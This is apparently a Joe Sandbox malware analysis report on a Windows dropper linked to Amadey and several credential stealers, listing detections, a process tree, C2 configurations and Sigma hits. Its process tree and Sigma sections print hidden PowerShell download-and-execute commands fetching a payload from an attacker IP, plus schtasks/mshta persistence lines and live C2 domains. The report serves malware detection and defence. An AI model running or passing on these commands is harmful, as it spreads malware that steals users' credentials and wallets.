Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
M6gQuZPvgY.exe

Overview

General Information

Sample name:M6gQuZPvgY.exe
renamed because original name is a hash value
Original sample name:d9f00ea479721f7581810bda98dca097.exe
Analysis ID:1639961
MD5:d9f00ea479721f7581810bda98dca097
SHA1:0b438eab56eb426d68bdeb2bd7c6f69af19daca6
SHA256:53e550919e4087a4a81da0a462925b7772fa2ddd870e6036a2069347631214e1
Tags:exeuser-abuse_ch
Infos:

Detection

Amadey, LummaC Stealer, Mars Stealer, PureLog Stealer, Stealc, Vidar
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Yara detected Amadey
Yara detected Amadeys Clipper DLL
Yara detected LummaC Stealer
Yara detected Mars stealer
Yara detected Powershell download and execute
Yara detected PureLog Stealer
Yara detected Stealc
Yara detected Vidar stealer
Yara detected obfuscated html page
.NET source code contains method to dynamically call methods (often used by packers)
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Contains functionality to inject code into remote processes
Contains functionality to start a terminal service
Creates HTA files
Creates multiple autostart registry keys
Found API chain indicative of sandbox detection
Found evasive API chain (may stop execution after checking computer name)
Found evasive API chain (may stop execution after checking locale)
Found evasive API chain (may stop execution after checking mutex)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
PE file has a writeable .text section
PE file has nameless sections
Potentially malicious time measurement code found
Powershell drops PE file
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: PowerShell DownloadFile
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Script Execution From Temp Folder
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to download and execute files (via powershell)
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May check if the current machine is a sandbox (GetTickCount - Sleep)
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • M6gQuZPvgY.exe (PID: 2112 cmdline: "C:\Users\user\Desktop\M6gQuZPvgY.exe" MD5: D9F00EA479721F7581810BDA98DCA097)
    • rapes.exe (PID: 1972 cmdline: "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe" MD5: D9F00EA479721F7581810BDA98DCA097)
  • rapes.exe (PID: 5424 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: D9F00EA479721F7581810BDA98DCA097)
  • rapes.exe (PID: 7596 cmdline: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe MD5: D9F00EA479721F7581810BDA98DCA097)
    • amnew.exe (PID: 5800 cmdline: "C:\Users\user\AppData\Local\Temp\10234920101\amnew.exe" MD5: 22892B8303FA56F4B584A04C09D508D8)
      • futors.exe (PID: 3456 cmdline: "C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe" MD5: 22892B8303FA56F4B584A04C09D508D8)
        • trano1221.exe (PID: 7824 cmdline: "C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe" MD5: F70D82388840543CAD588967897E5802)
          • trano1221.exe (PID: 2064 cmdline: "C:\Users\user\AppData\Local\Temp\10001200101\trano1221.exe" MD5: F70D82388840543CAD588967897E5802)
        • cronikxqqq.exe (PID: 4780 cmdline: "C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe" MD5: AB09D0DB97F3518A25CD4E6290862DA7)
          • cronikxqqq.exe (PID: 5388 cmdline: "C:\Users\user\AppData\Local\Temp\10001960101\cronikxqqq.exe" MD5: AB09D0DB97F3518A25CD4E6290862DA7)
          • WerFault.exe (PID: 5412 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 4780 -s 888 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • UD49QH6.exe (PID: 6024 cmdline: "C:\Users\user\AppData\Local\Temp\10235300101\UD49QH6.exe" MD5: 65982D78F4862DD0FAAF93D7BEF348EC)
    • m0wsoI3.exe (PID: 5132 cmdline: "C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe" MD5: 599E5D1EEA684EF40FC206F71B5D4643)
      • cmd.exe (PID: 5888 cmdline: "C:\Windows\System32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exe" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2856 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 6872 cmdline: timeout /t 5 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
    • 8e933e9d51.exe (PID: 7232 cmdline: "C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe" MD5: F043914DC1106C2CE233F6FA23AE2C9F)
      • cmd.exe (PID: 7248 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 7392 cmdline: schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)
      • mshta.exe (PID: 7256 cmdline: mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)
        • powershell.exe (PID: 2520 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 4232 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\10235700121\am_no.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 3528 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 5144 cmdline: timeout /t 2 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
      • cmd.exe (PID: 5232 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • powershell.exe (PID: 1812 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 2880 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • powershell.exe (PID: 1568 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • cmd.exe (PID: 7516 cmdline: C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • powershell.exe (PID: 2360 cmdline: powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • schtasks.exe (PID: 2196 cmdline: schtasks /create /tn "F80nHmaMuIn" /tr "mshta \"C:\Temp\J9hHfTRUK.hta\"" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)
      • mshta.exe (PID: 2460 cmdline: mshta "C:\Temp\J9hHfTRUK.hta" MD5: 06B02D5C097C7DB1F109749C45F3F505)
        • powershell.exe (PID: 3204 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
          • conhost.exe (PID: 3396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • c1f0508103.exe (PID: 3032 cmdline: "C:\Users\user\AppData\Local\Temp\10235920101\c1f0508103.exe" MD5: D5D7ED1F1BFE9A359ED87B37C22E3D59)
  • futors.exe (PID: 5404 cmdline: C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exe MD5: 22892B8303FA56F4B584A04C09D508D8)
  • mshta.exe (PID: 5916 cmdline: C:\Windows\system32\mshta.EXE C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
    • powershell.exe (PID: 8000 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2264 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • mshta.exe (PID: 3564 cmdline: C:\Windows\system32\mshta.EXE "C:\Temp\J9hHfTRUK.hta" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
  • 8e933e9d51.exe (PID: 668 cmdline: "C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe" MD5: F043914DC1106C2CE233F6FA23AE2C9F)
    • cmd.exe (PID: 4524 cmdline: C:\Windows\system32\cmd.exe /c schtasks /create /tn pmi96maNnhC /tr "mshta C:\Users\user\AppData\Local\Temp\8kUU4r0rO.hta" /sc minute /mo 25 /ru "user" /f MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 6220 cmdline: schtasks /create /tn pmi96maNnhC /tr "mshta C:\Users\user\AppData\Local\Temp\8kUU4r0rO.hta" /sc minute /mo 25 /ru "user" /f MD5: 48C2FE20575769DE916F48EF0676A965)
    • mshta.exe (PID: 4548 cmdline: mshta C:\Users\user\AppData\Local\Temp\8kUU4r0rO.hta MD5: 06B02D5C097C7DB1F109749C45F3F505)
      • powershell.exe (PID: 6248 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LFGBUS0KLVO2BZEOKEK9O00ZZUDBS8RY.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 6348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • Conhost.exe (PID: 7500 cmdline: MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: LummaC

{"C2 url": ["codxefusion.top", "hardswarehub.today", "gadgethgfub.icu", "hardrwarehaven.run", "techmindzs.live", "quietswtreams.life", "techspherxe.top"], "Build id": "CRON--@CRONLOGS"}

Threatname: Mars Stealer

{"C2 url": "ctrlgem.xyz/gate.php"}

Threatname: Amadey

{"C2 url": "176.113.115.6/Ni9kiput/index.php", "Version": "5.21", "Install Folder": "bb556cff4a", "Install File": "rapes.exe"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\10235380101\m0wsoI3.exeJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
    C:\Users\user\AppData\Local\Temp\97419fb2c0\futors.exeJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\m0wsoI3[1].exeJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\amnew[1].exeJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\58P5KO4N\cronikxqqq[1].exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
            Click to see the 5 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                00000011.00000002.1518652176.00000000005BE000.00000004.00000020.00020000.00000000.sdmpWindows_Trojan_Vidar_114258d5unknownunknown
                • 0xcc38:$a2: *wallet*.dat
                • 0xd558:$b1: CC\%s_%s.txt
                • 0xdb60:$b2: History\%s_%s.txt
                • 0xd880:$b3: Autofill\%s_%s.txt
                00000031.00000002.1772447973.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LummaCStealer_4Yara detected LummaC StealerJoe Security
                  00000011.00000002.1518189012.000000000043C000.00000040.00000001.01000000.0000000E.sdmpJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                    Click to see the 32 entries

                    Unpacked PEs

                    SourceRuleDescriptionAuthorStrings
                    48.2.cronikxqqq.exe.3c89550.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                      48.0.cronikxqqq.exe.870000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                        17.2.m0wsoI3.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                          17.2.m0wsoI3.exe.400000.0.unpackJoeSecurity_MarsStealerYara detected Mars stealerJoe Security
                            17.2.m0wsoI3.exe.400000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                              Click to see the 16 entries

                              Other

                              SourceRuleDescriptionAuthorStrings
                              amsi32_2520.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                                amsi64_8000.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                                  amsi32_3204.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                                    amsi32_6248.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

                                      Sigma Signatures

                                      System Summary

                                      barindex
                                      Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                                      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe, ParentProcessId: 7232, ParentProcessName: 8e933e9d51.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 7248, ProcessName: cmd.exe
                                      Sigma detected: Invoke-Obfuscation VAR+ Launcher
                                      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: C:\Windows\system32\cmd.exe /c schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f, CommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe, ParentProcessId: 7232, ParentProcessName: 8e933e9d51.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c schtasks /create /tn D966dmaFhpu /tr "mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta" /sc minute /mo 25 /ru "user" /f, ProcessId: 7248, ProcessName: cmd.exe
                                      Sigma detected: New RUN Key Pointing to Suspicious Folder
                                      Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe, ProcessId: 7596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8e933e9d51.exe
                                      Sigma detected: PowerShell DownloadFile
                                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7256, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 2520, ProcessName: powershell.exe
                                      Sigma detected: Script Interpreter Execution From Suspicious Folder
                                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe, ParentProcessId: 7232, ParentProcessName: 8e933e9d51.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta, ProcessId: 7256, ProcessName: mshta.exe
                                      Sigma detected: Suspicious MSHTA Child Process
                                      Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta, ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 7256, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'YEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;, ProcessId: 2520, ProcessName: powershell.exe
                                      Sigma detected: Suspicious Script Execution From Temp Folder
                                      Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta, CommandLine: mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta, CommandLine|base64offset|contains: m, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe, ParentProcessId: 7232, ParentProcessName: 8e933e9d51.exe, ProcessCommandLine: mshta C:\Users\user\AppData\Local\Temp\vlsMF3EOY.hta, ProcessId: 7256, ProcessName: mshta.exe
                                      Sigma detected: CurrentVersion Autorun Keys Modification
                                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\10235690101\8e933e9d51.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe, ProcessId: 7596, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\8e933e9d51.exe
                                      Sigma detected: Potential Binary Or Script Dropper Via PowerShell
                                      Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 2520, TargetFilename: C:\Users\user\AppData\Local\TempYEYJUOU43TXCZXVY5OTB13DT4WWGJ2P8.EXE
                                      Sigma detected: PowerShell Download Pattern
